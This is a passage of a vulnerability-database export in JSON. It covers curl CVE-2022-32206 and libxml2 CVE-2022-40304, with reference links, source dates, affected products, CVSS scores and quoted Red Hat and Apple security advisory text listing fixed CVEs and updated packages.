"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-31150"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28915"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21123"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21166"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21125"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1729"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-31151"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6344"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.11/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0408"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30632"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23772"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28131"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29526"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30633"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42898"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23773"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30630"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1962"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30635"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3787"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1798"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6422"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/multicluster_engine/index#installing-while-connected-online"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-36067"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-38177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28327"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24921"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24675"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-38178"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28614"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22721"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26377"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-31813"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42915"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28615"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42916"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22721"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-35252"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28614"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28615"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28330"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26377"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8840"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-23916"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23916"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:3460"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/logging/cluster-logging-release-notes.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6183"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-32206"
},
{
"db": "PACKETSTORM",
"id": "168538"
},
{
"db": "PACKETSTORM",
"id": "168275"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "168347"
},
{
"db": "PACKETSTORM",
"id": "170083"
},
{
"db": "PACKETSTORM",
"id": "170166"
},
{
"db": "PACKETSTORM",
"id": "172765"
},
{
"db": "PACKETSTORM",
"id": "168284"
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
},
{
"db": "NVD",
"id": "CVE-2022-32206"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2022-32206",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168538",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168275",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168347",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170083",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170166",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "172765",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168284",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2565",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-32206",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-09-27T16:01:00",
"db": "PACKETSTORM",
"id": "168538",
"ident": null
},
{
"date": "2022-09-07T16:50:50",
"db": "PACKETSTORM",
"id": "168275",
"ident": null
},
{
"date": "2023-01-26T15:29:09",
"db": "PACKETSTORM",
"id": "170741",
"ident": null
},
{
"date": "2022-09-13T15:29:12",
"db": "PACKETSTORM",
"id": "168347",
"ident": null
},
{
"date": "2022-12-02T15:57:08",
"db": "PACKETSTORM",
"id": "170083",
"ident": null
},
{
"date": "2022-12-08T21:28:44",
"db": "PACKETSTORM",
"id": "170166",
"ident": null
},
{
"date": "2023-06-06T17:04:24",
"db": "PACKETSTORM",
"id": "172765",
"ident": null
},
{
"date": "2022-09-07T16:57:47",
"db": "PACKETSTORM",
"id": "168284",
"ident": null
},
{
"date": "2022-06-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202206-2565",
"ident": null
},
{
"date": "2022-07-07T13:15:08.340000",
"db": "NVD",
"id": "CVE-2022-32206",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202206-2565",
"ident": null
},
{
"date": "2025-05-05T17:18:13.120000",
"db": "NVD",
"id": "CVE-2022-32206",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "curl Resource Management Error Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
}
],
"trust": 0.6
}
}
VAR-202210-1070
Vulnerability from variot - Updated: 2026-04-10 23:25An issue was discovered in libxml2 before 2.10.3. Certain invalid XML entity definitions can corrupt a hash table key, potentially leading to subsequent logic errors. In one case, a double-free can be provoked. It is written in C language and can be called by many languages, such as C language, C++, XSH. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Summary:
OpenShift API for Data Protection (OADP) 1.1.2 is now available. Description:
OpenShift API for Data Protection (OADP) enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers 2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters 2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps 2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests
- JIRA issues fixed (https://issues.jboss.org/):
OADP-1056 - DPA fails validation if multiple BSLs have the same provider OADP-1150 - Handle docker env config changes in the oadp-operator OADP-1217 - update velero + restic to 1.9.5 OADP-1256 - Backup stays in progress status after restic pod is restarted due to OOM killed OADP-1289 - Restore partially fails with error "Secrets \"deployer-token-rrjqx\" not found" OADP-290 - Remove creation/usage of velero-privileged SCC
- Description:
Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):
2160492 - CVE-2023-22482 ArgoCD: JWT audience claim is not verified 2162517 - CVE-2023-22736 argocd: Controller reconciles apps outside configured namespaces when sharding is enabled
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: libxml2 security update Advisory ID: RHSA-2023:0338-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2023:0338 Issue date: 2023-01-23 CVE Names: CVE-2022-40303 CVE-2022-40304 ==================================================================== 1. Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Security Fix(es):
-
libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)
-
libxml2: dict corruption caused by entity reference cycles (CVE-2022-40304)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The desktop must be restarted (log out, then log back in) for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE 2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles
- Package List:
Red Hat Enterprise Linux AppStream (v. 9):
aarch64: libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm libxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm libxml2-devel-2.9.13-3.el9_1.aarch64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm
ppc64le: libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm libxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm libxml2-devel-2.9.13-3.el9_1.ppc64le.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm libxml2-debugsource-2.9.13-3.el9_1.s390x.rpm libxml2-devel-2.9.13-3.el9_1.s390x.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm
x86_64: libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm libxml2-debugsource-2.9.13-3.el9_1.i686.rpm libxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm libxml2-devel-2.9.13-3.el9_1.i686.rpm libxml2-devel-2.9.13-3.el9_1.x86_64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm
Red Hat Enterprise Linux BaseOS (v. 9):
Source: libxml2-2.9.13-3.el9_1.src.rpm
aarch64: libxml2-2.9.13-3.el9_1.aarch64.rpm libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm libxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm python3-libxml2-2.9.13-3.el9_1.aarch64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm
ppc64le: libxml2-2.9.13-3.el9_1.ppc64le.rpm libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm libxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm python3-libxml2-2.9.13-3.el9_1.ppc64le.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm
s390x: libxml2-2.9.13-3.el9_1.s390x.rpm libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm libxml2-debugsource-2.9.13-3.el9_1.s390x.rpm python3-libxml2-2.9.13-3.el9_1.s390x.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm
x86_64: libxml2-2.9.13-3.el9_1.i686.rpm libxml2-2.9.13-3.el9_1.x86_64.rpm libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm libxml2-debugsource-2.9.13-3.el9_1.i686.rpm libxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm python3-libxml2-2.9.13-3.el9_1.x86_64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2022-40303 https://access.redhat.com/security/cve/CVE-2022-40304 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc. Bugs fixed (https://bugzilla.redhat.com/):
2171870 - CVE-2023-0923 odh-notebook-controller-container: Missing authorization allows for file contents disclosure
- JIRA issues fixed (https://issues.jboss.org/):
RHODS-6123 - Update dsp repo to match upstream kfp-tekton repo RHODS-6136 - Verify status of manifests RHODS-6330 - Remove Openvino and Etcd images from quay for self-managed deployments RHODS-6779 - [Model Serving] fallback image for ovms is not published, leading to image pull errors in upgrade scenarios
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2022-12-13-8 watchOS 9.2
watchOS 9.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213536.
Accounts Available for: Apple Watch Series 4 and later Impact: A user may be able to view sensitive user information Description: This issue was addressed with improved data protection. CVE-2022-42843: Mickey Jin (@patch1t)
AppleAVD Available for: Apple Watch Series 4 and later Impact: Parsing a maliciously crafted video file may lead to kernel code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46694: Andrey Labunets and Nikita Tarakanov
AppleMobileFileIntegrity Available for: Apple Watch Series 4 and later Impact: An app may be able to bypass Privacy preferences Description: This issue was addressed by enabling hardened runtime. CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing
CoreServices Available for: Apple Watch Series 4 and later Impact: An app may be able to bypass Privacy preferences Description: Multiple issues were addressed by removing the vulnerable code. CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security
ImageIO Available for: Apple Watch Series 4 and later Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46693: Mickey Jin (@patch1t)
IOHIDFamily Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2022-42864: Tommy Muir (@Muirey03)
IOMobileFrameBuffer Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46690: John Aakerblom (@jaakerblom)
iTunes Store Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation. CVE-2022-42837: an anonymous researcher
Kernel Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with additional validation. CVE-2022-46689: Ian Beer of Google Project Zero
Kernel Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause kernel code execution Description: The issue was addressed with improved memory handling. CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year Lab
Kernel Available for: Apple Watch Series 4 and later Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42845: Adam Doupé of ASU SEFCOM
libxml2 Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An integer overflow was addressed through improved input validation. CVE-2022-40303: Maddie Stone of Google Project Zero
libxml2 Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: This issue was addressed with improved checks. CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero
Safari Available for: Apple Watch Series 4 and later Impact: Visiting a website that frames malicious content may lead to UI spoofing Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. CVE-2022-46695: KirtiKumar Anandrao Ramchandani
Software Update Available for: Apple Watch Series 4 and later Impact: A user may be able to elevate privileges Description: An access issue existed with privileged API calls. This issue was addressed with additional restrictions. CVE-2022-42849: Mickey Jin (@patch1t)
Weather Available for: Apple Watch Series 4 and later Impact: An app may be able to read sensitive location information Description: The issue was addressed with improved handling of caches. CVE-2022-42866: an anonymous researcher
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. WebKit Bugzilla: 245521 CVE-2022-42867: Maddie Stone of Google Project Zero
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory consumption issue was addressed with improved memory handling. WebKit Bugzilla: 245466 CVE-2022-46691: an anonymous researcher
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may bypass Same Origin Policy Description: A logic issue was addressed with improved state management. WebKit Bugzilla: 246783 CVE-2022-46692: KirtiKumar Anandrao Ramchandani
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: The issue was addressed with improved memory handling. CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved input validation. WebKit Bugzilla: 246942 CVE-2022-46696: Samuel Groß of Google V8 Security WebKit Bugzilla: 247562 CVE-2022-46700: Samuel Groß of Google V8 Security
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A logic issue was addressed with improved checks. CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 247420 CVE-2022-46699: Samuel Groß of Google V8 Security WebKit Bugzilla: 244622 CVE-2022-42863: an anonymous researcher
Additional recognition
Kernel We would like to acknowledge Zweig of Kunlun Lab for their assistance.
Safari Extensions We would like to acknowledge Oliver Dunk and Christian R. of 1Password for their assistance.
WebKit We would like to acknowledge an anonymous researcher and scarlet for their assistance.
Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641 To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". Alternatively, on your watch, select "My Watch > General > About". All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke NxlyKA//eeU/txeqNxHM7JQE6xFrlla1tinQYMjbLhMgzdTbKpPjX8aHVqFfLB/Q 5nH+NqrGs4HQwNQJ6fSiBIId0th71mgX7W3Noa1apzFh7Okl6IehczkAFB9OH7ve vnwiEECGU0hUNmbIi0s9HuuBo6eSNPFsJt0Jqn8ovV+F9bc+ftl/IRv6q2vg3rl3 DNag62BCmCN4uXmqoJ4CKg7cNbddvma0bDbB1yYujxdmFwm4JGN6aittXE3WtPK2 GH2/UxdZll8FR7Zegh1ziUcTaLR4dwHlXRFgc6WC8hqx6T8imNh1heAPwzhT+Iag piObDoMs7UYFKF/eQ8LUcl4hX8IOdLFO5I+BcvCzOcKqHutPqbE8QRU9yqjcQlsJ sOV7GT9W9J+QhibpIJbLVkkQp5djPZ8mLP0OKiRN1quEDWMrquPdM+r9ftJwEIki PLL/ur9c7geXCJCLzglMSMkNcoGZk77qzfJuPdoE0lD6zjdvBHalF5j8S0a1+9gi ex3zU1I+ixqg7CvLNfkSjLcO9KOoPEFHnqEFrrO17QWWyraugrPgV0dMYArGRBpA FofYP6bXLv8eSUNuyOoQxF6kS4ChYgLUabl2NYqop9LoRWAtDAclTiabuvDJPfqA W09wxdhbpp2saxt8LlQjffzOmHJST6oHhHZiFiFswRM0q0nue6I= =DltD -----END PGP SIGNATURE-----
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "tvos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "16.2"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "clustered data ontap antivirus connector",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "11.0"
},
{
"_id": null,
"model": "smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "12.0"
},
{
"_id": null,
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.7.2"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ipados",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.7.2"
},
{
"_id": null,
"model": "libxml2",
"scope": "lt",
"trust": 1.0,
"vendor": "xmlsoft",
"version": "2.10.3"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.7.2"
},
{
"_id": null,
"model": "watchos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "9.2"
},
{
"_id": null,
"model": "manageability software development kit",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "snapmanager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.6.2"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-40304"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "171173"
}
],
"trust": 0.6
},
"cve": "CVE-2022-40304",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2022-40304",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-40304",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-40304",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-1022",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
},
{
"db": "NVD",
"id": "CVE-2022-40304"
},
{
"db": "NVD",
"id": "CVE-2022-40304"
}
]
},
"description": {
"_id": null,
"data": "An issue was discovered in libxml2 before 2.10.3. Certain invalid XML entity definitions can corrupt a hash table key, potentially leading to subsequent logic errors. In one case, a double-free can be provoked. It is written in C language and can be called by many languages, such as C language, C++, XSH. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Summary:\n\nOpenShift API for Data Protection (OADP) 1.1.2 is now available. Description:\n\nOpenShift API for Data Protection (OADP) enables you to back up and restore\napplication resources, persistent volume data, and internal container\nimages to external backup storage. OADP enables both file system-based and\nsnapshot-based backups for persistent volumes. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers\n2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters\n2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps\n2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nOADP-1056 - DPA fails validation if multiple BSLs have the same provider\nOADP-1150 - Handle docker env config changes in the 